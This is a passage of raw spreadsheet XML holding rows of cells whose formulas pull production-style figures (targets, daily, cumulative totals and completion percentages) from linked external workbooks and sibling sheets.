        <f>'[13]23'!$S$73</f>
        <v>5871.640364</v>
      </c>
    </row>
    <row r="21" ht="15.75" customHeight="1" spans="1:26">
      <c r="A21" s="191" t="s">
        <v>229</v>
      </c>
      <c r="B21" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C21" s="193"/>
      <c r="D21" s="193"/>
      <c r="E21" s="194">
        <v>190000</v>
      </c>
      <c r="F21" s="194">
        <f>'[10]23'!$D$22</f>
        <v>83053.31</v>
      </c>
      <c r="G21" s="194">
        <f>'[10]23'!$E$22</f>
        <v>8073</v>
      </c>
      <c r="H21" s="194">
        <f>G21+'22'!H21</f>
        <v>168442</v>
      </c>
      <c r="I21" s="194">
        <f>H21+yc!I21</f>
        <v>2277880</v>
      </c>
      <c r="J21" s="194">
        <f>'[10]23'!$I$22</f>
        <v>8463.26</v>
      </c>
      <c r="K21" s="194">
        <f>J21+'22'!K21</f>
        <v>185756.21</v>
      </c>
      <c r="L21" s="194">
        <f>K21+yc!L21</f>
        <v>2252210.21</v>
      </c>
      <c r="M21" s="194">
        <f>'[10]23'!$L$22</f>
        <v>65739.1</v>
      </c>
      <c r="N21" s="195">
        <f>M21/47000*100</f>
        <v>139.870425531915</v>
      </c>
      <c r="O21" s="199"/>
      <c r="P21" s="215"/>
      <c r="Q21" s="193" t="s">
        <v>294</v>
      </c>
      <c r="R21" s="209">
        <f>'[13]23'!$W$81</f>
        <v>264</v>
      </c>
      <c r="S21" s="209">
        <f>'[13]23'!$X$81</f>
        <v>279.173184681938</v>
      </c>
      <c r="T21" s="209">
        <f>'[13]23'!$Y$81</f>
        <v>275.876723379728</v>
      </c>
      <c r="U21" s="209">
        <f>'[13]23'!$T$81</f>
        <v>61.8055555555556</v>
      </c>
      <c r="V21" s="209">
        <f>'[13]23'!$U$81</f>
        <v>31.1983695652174</v>
      </c>
      <c r="W21" s="209">
        <f>'[13]23'!$V$81</f>
        <v>35.8074035169624</v>
      </c>
      <c r="X21" s="209">
        <f>'[13]23'!$Q$81</f>
        <v>14.8333333333333</v>
      </c>
      <c r="Y21" s="209">
        <f>'[13]23'!$R$81</f>
        <v>172.215</v>
      </c>
      <c r="Z21" s="209">
        <f>'[13]23'!$S$81</f>
        <v>3067.97833333333</v>
      </c>
    </row>
    <row r="22" ht="15.75" customHeight="1" spans="1:26">
      <c r="A22" s="191"/>
      <c r="B22" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C22" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D22" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E22" s="194">
        <v>163000</v>
      </c>
      <c r="F22" s="194">
        <f>'[10]23'!$D$17</f>
        <v>189966.352</v>
      </c>
      <c r="G22" s="194">
        <f>'[10]23'!$E$17</f>
        <v>0</v>
      </c>
      <c r="H22" s="194">
        <f>G22+'22'!H22</f>
        <v>62660</v>
      </c>
      <c r="I22" s="194">
        <f>H22+yc!I22</f>
        <v>2093641</v>
      </c>
      <c r="J22" s="194">
        <f>'[10]23'!$I$17</f>
        <v>7954.68</v>
      </c>
      <c r="K22" s="194">
        <f>J22+'22'!K22</f>
        <v>155139.55</v>
      </c>
      <c r="L22" s="194">
        <f>K22+yc!L22</f>
        <v>2046600.93</v>
      </c>
      <c r="M22" s="194">
        <f>'[10]23'!$L$17</f>
        <v>97486.802</v>
      </c>
      <c r="N22" s="216">
        <f>(M22+M23)/(50000+150000)*100</f>
        <v>48.743401</v>
      </c>
      <c r="O22" s="199"/>
      <c r="P22" s="215"/>
      <c r="Q22" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R22" s="209">
        <f>'[13]23'!$W$79</f>
        <v>90.051282051282</v>
      </c>
      <c r="S22" s="209">
        <f>'[13]23'!$X$79</f>
        <v>100.88175474065</v>
      </c>
      <c r="T22" s="209">
        <f>'[13]23'!$Y$79</f>
        <v>102.163613275646</v>
      </c>
      <c r="U22" s="209">
        <f>'[13]23'!$T$79</f>
        <v>40.625</v>
      </c>
      <c r="V22" s="209">
        <f>'[13]23'!$U$79</f>
        <v>49.582729468599</v>
      </c>
      <c r="W22" s="209">
        <f>'[13]23'!$V$79</f>
        <v>45.6495746446727</v>
      </c>
      <c r="X22" s="209">
        <f>'[13]23'!$Q$79</f>
        <v>9.75</v>
      </c>
      <c r="Y22" s="209">
        <f>'[13]23'!$R$79</f>
        <v>273.696666666667</v>
      </c>
      <c r="Z22" s="209">
        <f>'[13]23'!$S$79</f>
        <v>3911.25555555556</v>
      </c>
    </row>
    <row r="23" ht="15.75" customHeight="1" spans="1:26">
      <c r="A23" s="191"/>
      <c r="B23" s="193"/>
      <c r="C23" s="193"/>
      <c r="D23" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E23" s="194"/>
      <c r="F23" s="194">
        <f>'[10]23'!$D$20</f>
        <v>0</v>
      </c>
      <c r="G23" s="194">
        <f>'[10]23'!$E$20</f>
        <v>0</v>
      </c>
      <c r="H23" s="194">
        <f>G23+'22'!H23</f>
        <v>0</v>
      </c>
      <c r="I23" s="194">
        <f>H23+yc!I23</f>
        <v>0</v>
      </c>
      <c r="J23" s="194">
        <f>'[10]23'!$I$20</f>
        <v>0</v>
      </c>
      <c r="K23" s="194">
        <f>J23+'22'!K23</f>
        <v>0</v>
      </c>
      <c r="L23" s="194">
        <f>K23+yc!L23</f>
        <v>0</v>
      </c>
      <c r="M23" s="194">
        <f>'[10]23'!$L$21</f>
        <v>0</v>
      </c>
      <c r="N23" s="217"/>
      <c r="O23" s="199"/>
      <c r="P23" s="214"/>
      <c r="Q23" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R23" s="209">
        <f>'[13]23'!$W$80</f>
        <v>87.2</v>
      </c>
      <c r="S23" s="209">
        <f>'[13]23'!$X$80</f>
        <v>84.0875838114989</v>
      </c>
      <c r="T23" s="209">
        <f>'[13]23'!$Y$80</f>
        <v>79.4755154056492</v>
      </c>
      <c r="U23" s="209">
        <f>'[13]23'!$T$80</f>
        <v>41.6666666666667</v>
      </c>
      <c r="V23" s="209">
        <f>'[13]23'!$U$80</f>
        <v>35.5973731884058</v>
      </c>
      <c r="W23" s="209">
        <f>'[13]23'!$V$80</f>
        <v>32.6955337690632</v>
      </c>
      <c r="X23" s="209">
        <f>'[13]23'!$Q$80</f>
        <v>10</v>
      </c>
      <c r="Y23" s="209">
        <f>'[13]23'!$R$80</f>
        <v>196.4975</v>
      </c>
      <c r="Z23" s="209">
        <f>'[13]23'!$S$80</f>
        <v>2801.35333333333</v>
      </c>
    </row>
    <row r="24" ht="15.75" customHeight="1" spans="1:26">
      <c r="A24" s="191"/>
      <c r="B24" s="193"/>
      <c r="C24" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D24" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E24" s="194"/>
      <c r="F24" s="194">
        <f>'[10]23'!$D$21</f>
        <v>0</v>
      </c>
      <c r="G24" s="194">
        <f>'[10]23'!$E$56</f>
        <v>0</v>
      </c>
      <c r="H24" s="194">
        <f>G24+'22'!H24</f>
        <v>0</v>
      </c>
      <c r="I24" s="194">
        <f>H24+yc!I24</f>
        <v>0</v>
      </c>
      <c r="J24" s="194">
        <f>'[10]23'!$I$56</f>
        <v>1533.68</v>
      </c>
      <c r="K24" s="194">
        <f>J24+'22'!K24</f>
        <v>31346.77</v>
      </c>
      <c r="L24" s="194">
        <f>K24+yc!L24</f>
        <v>311173.3</v>
      </c>
      <c r="M24" s="194">
        <f>'[10]23'!$L$20</f>
        <v>0</v>
      </c>
      <c r="N24" s="195"/>
      <c r="O24" s="199"/>
      <c r="P24" s="218" t="s">
        <v>262</v>
      </c>
      <c r="Q24" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R24" s="209">
        <f>'[14]23'!$R$6</f>
        <v>81.7777777777778</v>
      </c>
      <c r="S24" s="209">
        <f>'[14]23'!$S$6</f>
        <v>85.5001104693369</v>
      </c>
      <c r="T24" s="209">
        <f>'[14]23'!$T$6</f>
        <v>86.1145042398714</v>
      </c>
      <c r="U24" s="209">
        <f>'[14]23'!$O$6</f>
        <v>75</v>
      </c>
      <c r="V24" s="209">
        <f>'[14]23'!$P$6</f>
        <v>57.3967391304348</v>
      </c>
      <c r="W24" s="209">
        <f>'[14]23'!$Q$6</f>
        <v>52.6464752567694</v>
      </c>
      <c r="X24" s="209">
        <f>'[14]23'!$L$6</f>
        <v>18</v>
      </c>
      <c r="Y24" s="209">
        <f>'[14]23'!$M$6</f>
        <v>316.83</v>
      </c>
      <c r="Z24" s="209">
        <f>'[14]23'!$N$6</f>
        <v>4510.75</v>
      </c>
    </row>
    <row r="25" ht="15.75" customHeight="1" spans="1:26">
      <c r="A25" s="191"/>
      <c r="B25" s="193"/>
      <c r="C25" s="193"/>
      <c r="D25" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E25" s="194"/>
      <c r="F25" s="194"/>
      <c r="G25" s="194">
        <f>'[10]23'!$E$69</f>
        <v>0</v>
      </c>
      <c r="H25" s="194">
        <f>G25+'22'!H25</f>
        <v>0</v>
      </c>
      <c r="I25" s="194">
        <f>H25+yc!I25</f>
        <v>0</v>
      </c>
      <c r="J25" s="194">
        <f>'[10]23'!$I$69</f>
        <v>0</v>
      </c>
      <c r="K25" s="194">
        <f>J25+'22'!K25</f>
        <v>473.78</v>
      </c>
      <c r="L25" s="194">
        <f>K25+yc!L25</f>
        <v>79794.63</v>
      </c>
      <c r="M25" s="194"/>
      <c r="N25" s="195"/>
      <c r="O25" s="199"/>
      <c r="P25" s="219"/>
      <c r="Q25" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R25" s="209">
        <f>'[14]23'!$R$7</f>
        <v>177.272727272727</v>
      </c>
      <c r="S25" s="209">
        <f>'[14]23'!$S$7</f>
        <v>194.005020920502</v>
      </c>
      <c r="T25" s="209">
        <f>'[14]23'!$T$7</f>
        <v>188.016189460189</v>
      </c>
      <c r="U25" s="209">
        <f>'[14]23'!$O$7</f>
        <v>68.75</v>
      </c>
      <c r="V25" s="209">
        <f>'[14]23'!$P$7</f>
        <v>54.1213768115942</v>
      </c>
      <c r="W25" s="209">
        <f>'[14]23'!$Q$7</f>
        <v>50.4356909430439</v>
      </c>
      <c r="X25" s="209">
        <f>'[14]23'!$L$7</f>
        <v>16.5</v>
      </c>
      <c r="Y25" s="209">
        <f>'[14]23'!$M$7</f>
        <v>298.75</v>
      </c>
      <c r="Z25" s="209">
        <f>'[14]23'!$N$7</f>
        <v>4321.33</v>
      </c>
    </row>
    <row r="26" ht="15.75" customHeight="1" spans="1:26">
      <c r="A26" s="191"/>
      <c r="B26" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C26" s="193"/>
      <c r="D26" s="193"/>
      <c r="E26" s="194"/>
      <c r="F26" s="194"/>
      <c r="G26" s="194"/>
      <c r="H26" s="194">
        <f>G26+'22'!H26</f>
        <v>0</v>
      </c>
      <c r="I26" s="194">
        <f>H26+yc!I26</f>
        <v>0</v>
      </c>
      <c r="J26" s="194">
        <f>J27+J30</f>
        <v>0</v>
      </c>
      <c r="K26" s="194">
        <f>J26+'22'!K26</f>
        <v>0</v>
      </c>
      <c r="L26" s="194">
        <f>K26+yc!L26</f>
        <v>0</v>
      </c>
      <c r="M26" s="194"/>
      <c r="N26" s="195"/>
      <c r="O26" s="199"/>
      <c r="P26" s="191" t="s">
        <v>263</v>
      </c>
      <c r="Q26" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R26" s="209">
        <f>'[15]23'!$I$38</f>
        <v>0</v>
      </c>
      <c r="S26" s="209">
        <f>'[15]23'!$J$38</f>
        <v>0</v>
      </c>
      <c r="T26" s="209">
        <f>'[15]23'!$K$38</f>
        <v>0</v>
      </c>
      <c r="U26" s="209">
        <f>'[15]23'!$F$38</f>
        <v>0</v>
      </c>
      <c r="V26" s="209">
        <f>'[15]23'!$G$38</f>
        <v>0</v>
      </c>
      <c r="W26" s="209">
        <f>'[15]23'!$H$38</f>
        <v>0</v>
      </c>
      <c r="X26" s="209">
        <f>'[15]23'!$C$38</f>
        <v>0</v>
      </c>
      <c r="Y26" s="209">
        <f>'[15]23'!$D$38</f>
        <v>0</v>
      </c>
      <c r="Z26" s="209">
        <f>'[15]23'!$E$38</f>
        <v>0</v>
      </c>
    </row>
    <row r="27" ht="15.75" customHeight="1" spans="1:26">
      <c r="A27" s="191"/>
      <c r="B27" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C27" s="193"/>
      <c r="D27" s="193"/>
      <c r="E27" s="194">
        <v>190000</v>
      </c>
      <c r="F27" s="194"/>
      <c r="G27" s="194"/>
      <c r="H27" s="194">
        <f>G27+'22'!H27</f>
        <v>0</v>
      </c>
      <c r="I27" s="194">
        <f>H27+yc!I27</f>
        <v>0</v>
      </c>
      <c r="J27" s="194">
        <f>SUM(J28:J29)</f>
        <v>0</v>
      </c>
      <c r="K27" s="194">
        <f>J27+'22'!K27</f>
        <v>0</v>
      </c>
      <c r="L27" s="194">
        <f>K27+yc!L27</f>
        <v>0</v>
      </c>
      <c r="M27" s="194"/>
      <c r="N27" s="195"/>
      <c r="O27" s="220" t="s">
        <v>264</v>
      </c>
      <c r="P27" s="191" t="s">
        <v>237</v>
      </c>
      <c r="Q27" s="191"/>
      <c r="R27" s="209">
        <f>'[11]23'!$W$69</f>
        <v>0</v>
      </c>
      <c r="S27" s="209">
        <f>'[11]23'!$X$69</f>
        <v>22.5925764408544</v>
      </c>
      <c r="T27" s="209">
        <f>'[11]23'!$Y$69</f>
        <v>25.1966540548776</v>
      </c>
      <c r="U27" s="221">
        <f>'[11]23'!$T$69</f>
        <v>0</v>
      </c>
      <c r="V27" s="209">
        <f>'[11]23'!$U$69</f>
        <v>69.1394927536232</v>
      </c>
      <c r="W27" s="209">
        <f>'[11]23'!$V$69</f>
        <v>68.4235527544351</v>
      </c>
      <c r="X27" s="209" t="str">
        <f>'[11]23'!$Q$69</f>
        <v>0.00</v>
      </c>
      <c r="Y27" s="209" t="str">
        <f>'[11]23'!$R$69</f>
        <v>381.65</v>
      </c>
      <c r="Z27" s="209" t="str">
        <f>'[11]23'!$S$69</f>
        <v>5862.53</v>
      </c>
    </row>
    <row r="28" ht="15.75" customHeight="1" spans="1:26">
      <c r="A28" s="191"/>
      <c r="B28" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C28" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D28" s="193"/>
      <c r="E28" s="194"/>
      <c r="F28" s="194"/>
      <c r="G28" s="194"/>
      <c r="H28" s="194">
        <f>G28+'22'!H28</f>
        <v>0</v>
      </c>
      <c r="I28" s="194">
        <f>H28+yc!I28</f>
        <v>0</v>
      </c>
      <c r="J28" s="194"/>
      <c r="K28" s="194">
        <f>J28+'22'!K28</f>
        <v>0</v>
      </c>
      <c r="L28" s="194">
        <f>K28+yc!L28</f>
        <v>0</v>
      </c>
      <c r="M28" s="194"/>
      <c r="N28" s="195"/>
      <c r="O28" s="222"/>
      <c r="P28" s="223" t="s">
        <v>306</v>
      </c>
      <c r="Q28" s="224"/>
      <c r="R28" s="209">
        <f>'[10]23'!$W$104</f>
        <v>0</v>
      </c>
      <c r="S28" s="209">
        <f>'[10]23'!$X$104</f>
        <v>28.3179061602293</v>
      </c>
      <c r="T28" s="209">
        <f>'[10]23'!$Y$104</f>
        <v>26.0491177026315</v>
      </c>
      <c r="U28" s="209">
        <f>'[10]23'!$T$104</f>
        <v>0</v>
      </c>
      <c r="V28" s="209">
        <f>'[10]23'!$U$104</f>
        <v>41.841847826087</v>
      </c>
      <c r="W28" s="209">
        <f>'[10]23'!$V$104</f>
        <v>62.9203664799253</v>
      </c>
      <c r="X28" s="209">
        <f>'[10]23'!$Q$104</f>
        <v>0</v>
      </c>
      <c r="Y28" s="209">
        <f>'[10]23'!$R$104</f>
        <v>230.967</v>
      </c>
      <c r="Z28" s="209">
        <f>'[10]23'!$S$104</f>
        <v>5391.017</v>
      </c>
    </row>
    <row r="29" ht="15.75" customHeight="1" spans="1:26">
      <c r="A29" s="191"/>
      <c r="B29" s="191"/>
      <c r="C29" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D29" s="193"/>
      <c r="E29" s="194"/>
      <c r="F29" s="194"/>
      <c r="G29" s="194"/>
      <c r="H29" s="194">
        <f>G29+'22'!H29</f>
        <v>0</v>
      </c>
      <c r="I29" s="194">
        <f>H29+yc!I29</f>
        <v>0</v>
      </c>
      <c r="J29" s="194"/>
      <c r="K29" s="194">
        <f>J29+'22'!K29</f>
        <v>0</v>
      </c>
      <c r="L29" s="194">
        <f>K29+yc!L29</f>
        <v>0</v>
      </c>
      <c r="M29" s="225"/>
      <c r="N29" s="195"/>
      <c r="O29" s="222"/>
      <c r="P29" s="223" t="s">
        <v>307</v>
      </c>
      <c r="Q29" s="224"/>
      <c r="R29" s="209">
        <f>'[10]23'!$W$105</f>
        <v>0</v>
      </c>
      <c r="S29" s="209">
        <f>'[10]23'!$X$105</f>
        <v>0</v>
      </c>
      <c r="T29" s="209">
        <f>'[10]23'!$Y$105</f>
        <v>29.9342377123697</v>
      </c>
      <c r="U29" s="209">
        <f>'[10]23'!$T$105</f>
        <v>0</v>
      </c>
      <c r="V29" s="209">
        <f>'[10]23'!$U$105</f>
        <v>0</v>
      </c>
      <c r="W29" s="209">
        <f>'[10]23'!$V$105</f>
        <v>32.728548085901</v>
      </c>
      <c r="X29" s="209">
        <f>'[10]23'!$Q$105</f>
        <v>0</v>
      </c>
      <c r="Y29" s="209">
        <f>'[10]23'!$R$105</f>
        <v>0</v>
      </c>
      <c r="Z29" s="209">
        <f>'[10]23'!$S$105</f>
        <v>2804.182</v>
      </c>
    </row>
    <row r="30" ht="15.75" customHeight="1" spans="1:26">
      <c r="A30" s="191"/>
      <c r="B30" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C30" s="193"/>
      <c r="D30" s="193"/>
      <c r="E30" s="194"/>
      <c r="F30" s="194"/>
      <c r="G30" s="194"/>
      <c r="H30" s="194">
        <f>G30+'22'!H30</f>
        <v>0</v>
      </c>
      <c r="I30" s="194">
        <f>H30+yc!I30</f>
        <v>0</v>
      </c>
      <c r="J30" s="194"/>
      <c r="K30" s="194">
        <f>J30+'22'!K30</f>
        <v>0</v>
      </c>
      <c r="L30" s="194">
        <f>K30+yc!L30</f>
        <v>0</v>
      </c>
      <c r="M30" s="225"/>
      <c r="N30" s="195"/>
      <c r="O30" s="222"/>
      <c r="P30" s="223" t="s">
        <v>252</v>
      </c>
      <c r="Q30" s="224"/>
      <c r="R30" s="209">
        <f>'[12]23'!$W$72</f>
        <v>0</v>
      </c>
      <c r="S30" s="226">
        <f>'[12]23'!$X$72</f>
        <v>0</v>
      </c>
      <c r="T30" s="209">
        <f>'[12]23'!$Y$72</f>
        <v>0</v>
      </c>
      <c r="U30" s="209">
        <f>'[12]23'!$T$72</f>
        <v>0</v>
      </c>
      <c r="V30" s="209">
        <f>'[12]23'!$U$72</f>
        <v>0</v>
      </c>
      <c r="W30" s="209">
        <f>'[12]23'!$V$72</f>
        <v>0</v>
      </c>
      <c r="X30" s="209">
        <f>'[12]23'!$Q$72</f>
        <v>0</v>
      </c>
      <c r="Y30" s="209">
        <f>'[12]23'!$R$72</f>
        <v>0</v>
      </c>
      <c r="Z30" s="209">
        <f>'[12]23'!$S$72</f>
        <v>0</v>
      </c>
    </row>
    <row r="31" ht="15.75" customHeight="1" spans="1:26">
      <c r="A31" s="191" t="s">
        <v>237</v>
      </c>
      <c r="B31" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C31" s="193"/>
      <c r="D31" s="193"/>
      <c r="E31" s="194">
        <v>150000</v>
      </c>
      <c r="F31" s="194">
        <f>'[11]23'!$D$16</f>
        <v>65429.37</v>
      </c>
      <c r="G31" s="194">
        <f>'[11]23'!$E$16</f>
        <v>3723</v>
      </c>
      <c r="H31" s="194">
        <f>G31+'22'!H31</f>
        <v>106249</v>
      </c>
      <c r="I31" s="194">
        <f>H31+yc!I31</f>
        <v>1479256</v>
      </c>
      <c r="J31" s="194">
        <f>'[11]23'!$I$16</f>
        <v>5281.49</v>
      </c>
      <c r="K31" s="194">
        <f>J31+'22'!K31</f>
        <v>110851.39</v>
      </c>
      <c r="L31" s="194">
        <f>K31+yc!L31</f>
        <v>1466899.52</v>
      </c>
      <c r="M31" s="225">
        <f>'[11]23'!$L$16</f>
        <v>60826.98</v>
      </c>
      <c r="N31" s="195">
        <f>M31/75000*100</f>
        <v>81.10264</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'[11]23'!$D$13</f>
        <v>60437.506</v>
      </c>
      <c r="G32" s="194">
        <f>'[11]23'!$E$13</f>
        <v>0</v>
      </c>
      <c r="H32" s="194">
        <f>G32+'22'!H32</f>
        <v>103074</v>
      </c>
      <c r="I32" s="194">
        <f>H32+yc!I32</f>
        <v>1630917</v>
      </c>
      <c r="J32" s="194">
        <f>'[11]23'!$I$13</f>
        <v>2792</v>
      </c>
      <c r="K32" s="194">
        <f>J32+'22'!K32</f>
        <v>78179</v>
      </c>
      <c r="L32" s="194">
        <f>K32+yc!L32</f>
        <v>1099657</v>
      </c>
      <c r="M32" s="225">
        <f>'[11]23'!$L$13</f>
        <v>67276.796</v>
      </c>
      <c r="N32" s="207">
        <f>(M32+M33)/50000*100</f>
        <v>134.553592</v>
      </c>
      <c r="O32" s="222"/>
      <c r="P32" s="223" t="s">
        <v>308</v>
      </c>
      <c r="Q32" s="224"/>
      <c r="R32" s="209">
        <f>'[13]23'!$W$76</f>
        <v>0</v>
      </c>
      <c r="S32" s="209">
        <f>'[13]23'!$X$76</f>
        <v>0</v>
      </c>
      <c r="T32" s="209">
        <f>'[13]23'!$Y$76</f>
        <v>0</v>
      </c>
      <c r="U32" s="209">
        <f>'[13]23'!$T$76</f>
        <v>4.16666666666667e-11</v>
      </c>
      <c r="V32" s="209">
        <f>'[13]23'!$U$76</f>
        <v>3.98550724637681e-11</v>
      </c>
      <c r="W32" s="209">
        <f>'[13]23'!$V$76</f>
        <v>4.10830999066293e-11</v>
      </c>
      <c r="X32" s="209">
        <f>'[13]23'!$Q$76</f>
        <v>1e-11</v>
      </c>
      <c r="Y32" s="209">
        <f>'[13]23'!$R$76</f>
        <v>2.2e-10</v>
      </c>
      <c r="Z32" s="209">
        <f>'[13]23'!$S$76</f>
        <v>3.52e-9</v>
      </c>
    </row>
    <row r="33" ht="15.75" customHeight="1" spans="1:26">
      <c r="A33" s="191"/>
      <c r="B33" s="193"/>
      <c r="C33" s="193"/>
      <c r="D33" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E33" s="194"/>
      <c r="F33" s="194"/>
      <c r="G33" s="194">
        <f>'[11]23'!$E$14</f>
        <v>0</v>
      </c>
      <c r="H33" s="194">
        <f>G33+'22'!H33</f>
        <v>0</v>
      </c>
      <c r="I33" s="194">
        <f>H33+yc!I33</f>
        <v>0</v>
      </c>
      <c r="J33" s="194">
        <f>'[11]23'!$I$14</f>
        <v>0</v>
      </c>
      <c r="K33" s="194">
        <f>J33+'22'!K33</f>
        <v>0</v>
      </c>
      <c r="L33" s="194">
        <f>K33+yc!L33</f>
        <v>0</v>
      </c>
      <c r="M33" s="225">
        <f>'[11]23'!$L$14</f>
        <v>0</v>
      </c>
      <c r="N33" s="212"/>
      <c r="O33" s="222"/>
      <c r="P33" s="223" t="s">
        <v>309</v>
      </c>
      <c r="Q33" s="224"/>
      <c r="R33" s="209">
        <f>'[13]23'!$W$77</f>
        <v>18.3</v>
      </c>
      <c r="S33" s="209">
        <f>'[13]23'!$X$77</f>
        <v>17.75</v>
      </c>
      <c r="T33" s="209">
        <f>'[13]23'!$Y$77</f>
        <v>19.76</v>
      </c>
      <c r="U33" s="209">
        <f>'[13]23'!$T$77</f>
        <v>100.000000000042</v>
      </c>
      <c r="V33" s="209">
        <f>'[13]23'!$U$77</f>
        <v>10.1865942029004</v>
      </c>
      <c r="W33" s="209">
        <f>'[13]23'!$V$77</f>
        <v>59.7111344537829</v>
      </c>
      <c r="X33" s="209">
        <f>'[13]23'!$Q$77</f>
        <v>24.00000000001</v>
      </c>
      <c r="Y33" s="209">
        <f>'[13]23'!$R$77</f>
        <v>56.23000000001</v>
      </c>
      <c r="Z33" s="209">
        <f>'[13]23'!$S$77</f>
        <v>5116.05000000012</v>
      </c>
    </row>
    <row r="34" ht="15.75" customHeight="1" spans="1:26">
      <c r="A34" s="191"/>
      <c r="B34" s="193"/>
      <c r="C34" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D34" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E34" s="194"/>
      <c r="F34" s="194"/>
      <c r="G34" s="194">
        <f>'[11]23'!$E$50</f>
        <v>0</v>
      </c>
      <c r="H34" s="194">
        <f>G34+'22'!H34</f>
        <v>0</v>
      </c>
      <c r="I34" s="194">
        <f>H34+yc!I34</f>
        <v>0</v>
      </c>
      <c r="J34" s="194">
        <f>'[11]23'!$I$50</f>
        <v>0</v>
      </c>
      <c r="K34" s="194">
        <f>J34+'22'!K34</f>
        <v>18055.71</v>
      </c>
      <c r="L34" s="194">
        <f>K34+yc!L34</f>
        <v>485258.64</v>
      </c>
      <c r="M34" s="225">
        <f>'[11]23'!$L$15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'[11]23'!$E$64</f>
        <v>0</v>
      </c>
      <c r="H35" s="194">
        <f>G35+'22'!H35</f>
        <v>0</v>
      </c>
      <c r="I35" s="194">
        <f>H35+yc!I35</f>
        <v>0</v>
      </c>
      <c r="J35" s="194">
        <f>'[11]23'!$I$64</f>
        <v>0</v>
      </c>
      <c r="K35" s="194">
        <f>J35+'22'!K35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G36+'22'!H36</f>
        <v>0</v>
      </c>
      <c r="I36" s="194">
        <f>H36+yc!I36</f>
        <v>0</v>
      </c>
      <c r="J36" s="194">
        <f>J37+J40</f>
        <v>0</v>
      </c>
      <c r="K36" s="194">
        <f>J36+'22'!K36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G37+'22'!H37</f>
        <v>0</v>
      </c>
      <c r="I37" s="194">
        <f>H37+yc!I37</f>
        <v>0</v>
      </c>
      <c r="J37" s="194">
        <f>SUM(J38:J39)</f>
        <v>0</v>
      </c>
      <c r="K37" s="194">
        <f>J37+'22'!K37</f>
        <v>0</v>
      </c>
      <c r="L37" s="194">
        <f>K37+yc!L37</f>
        <v>0</v>
      </c>
      <c r="M37" s="225"/>
      <c r="N37" s="195"/>
      <c r="O37" s="197" t="s">
        <v>268</v>
      </c>
      <c r="P37" s="218" t="s">
        <v>229</v>
      </c>
      <c r="Q37" s="191" t="s">
        <v>277</v>
      </c>
      <c r="R37" s="231">
        <f>'[10]23'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S37" s="232">
        <f>'[10]23'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T37" s="233">
        <f>'[10]23'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U37" s="234">
        <f>T37+'22'!U37</f>
        <v>0</v>
      </c>
      <c r="V37" s="234">
        <f>U37+yc!V37</f>
        <v>0</v>
      </c>
      <c r="W37" s="235">
        <f>'[10]23'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X37" s="234">
        <f>W37+'22'!X37</f>
        <v>0</v>
      </c>
      <c r="Y37" s="235">
        <f>X37+yc!Y37</f>
        <v>0</v>
      </c>
      <c r="Z37" s="235">
        <f>'[10]23'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="38" ht="15.75" customHeight="1" spans="1:26">
      <c r="A38" s="191"/>
      <c r="B38" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C38" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D38" s="193"/>
      <c r="E38" s="194"/>
      <c r="F38" s="194"/>
      <c r="G38" s="225"/>
      <c r="H38" s="194">
        <f>G38+'22'!H38</f>
        <v>0</v>
      </c>
      <c r="I38" s="194">
        <f>H38+yc!I38</f>
        <v>0</v>
      </c>
      <c r="J38" s="194"/>
      <c r="K38" s="194">
        <f>J38+'22'!K38</f>
        <v>0</v>
      </c>
      <c r="L38" s="194">
        <f>K38+yc!L38</f>
        <v>0</v>
      </c>
      <c r="M38" s="194"/>
      <c r="N38" s="195"/>
      <c r="O38" s="200"/>
      <c r="P38" s="236"/>
      <c r="Q38" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R38" s="237">
        <f>'[10]23'!$P$10</f>
        <v>0</v>
      </c>
      <c r="S38" s="235">
        <f>'[10]23'!$Q$10</f>
        <v>9645.331</v>
      </c>
      <c r="T38" s="235">
        <f>'[10]23'!$R$10</f>
        <v>0</v>
      </c>
      <c r="U38" s="234">
        <f>T38+'22'!U38</f>
        <v>5520.34</v>
      </c>
      <c r="V38" s="234">
        <f>U38+yc!V38</f>
        <v>264660.06</v>
      </c>
      <c r="W38" s="235">
        <f>'[10]23'!$V$10</f>
        <v>0</v>
      </c>
      <c r="X38" s="234">
        <f>W38+'22'!X38</f>
        <v>7808</v>
      </c>
      <c r="Y38" s="235">
        <f>X38+yc!Y38</f>
        <v>263915</v>
      </c>
      <c r="Z38" s="235">
        <f>'[10]23'!$Y$10</f>
        <v>7357.671</v>
      </c>
    </row>
    <row r="39" ht="15.75" customHeight="1" spans="1:26">
      <c r="A39" s="191"/>
      <c r="B39" s="191"/>
      <c r="C39" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D39" s="193"/>
      <c r="E39" s="194"/>
      <c r="F39" s="194"/>
      <c r="G39" s="194"/>
      <c r="H39" s="194">
        <f>G39+'22'!H39</f>
        <v>0</v>
      </c>
      <c r="I39" s="194">
        <f>H39+yc!I39</f>
        <v>0</v>
      </c>
      <c r="J39" s="194"/>
      <c r="K39" s="194">
        <f>J39+'22'!K39</f>
        <v>0</v>
      </c>
      <c r="L39" s="194">
        <f>K39+yc!L39</f>
        <v>0</v>
      </c>
      <c r="M39" s="194"/>
